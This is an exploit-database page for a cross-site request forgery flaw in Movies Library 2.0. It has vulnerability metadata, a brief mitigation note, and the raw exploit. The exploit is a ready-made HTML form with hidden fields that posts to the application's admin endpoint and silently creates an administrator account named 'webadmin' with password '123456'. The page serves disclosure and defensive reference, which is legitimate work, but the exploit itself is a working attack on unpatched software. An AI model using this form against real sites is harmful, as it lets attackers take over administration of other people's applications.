header-logo
Suggest Exploit
vendor:
Movies Library
by:
AtT4CKxT3rR0r1ST
5.5
CVSS
MEDIUM
XSRF
Cross-Site Request Forgery (CSRF)
CWE
Product Name: Movies Library
Affected Version From: Movies Library 2.0
Affected Version To: Movies Library 2.0
Patch Exists: NO
Related CWE:
CPE: a:movies_library:2.0
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Movies Library 2.0 XSRF Vulnerability (Add Admin)

This exploit allows an attacker to add an admin user to the Movies Library 2.0 application. The attacker can send a crafted request to the targeted application, which will add a new user with admin privileges.

Mitigation:

To mitigate this vulnerability, developers should implement proper CSRF protection mechanisms such as using anti-CSRF tokens or checking the origin of the request.
Source

Exploit-DB raw data:

Movies Library 2.0 XSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://allomani.com/en/movies_script.html
####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://localhost/Movies Library/admin/index.php">
<input type="hidden" name="action" value="adduserok"/>
<input type="hidden" name="hash" value="e10adc3949ba59abbe56e057f20f883e"/>
<input type="hidden" name="username" value="webadmin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="email" value="Example@hotmail.com"/>
<input type="hidden" name="group_id" value="1"/>
<input type="hidden" name="useraddbutton" value="Add"/>
</form>

</body>
</html>
####################################################################




 		 	   		  
cqrsecured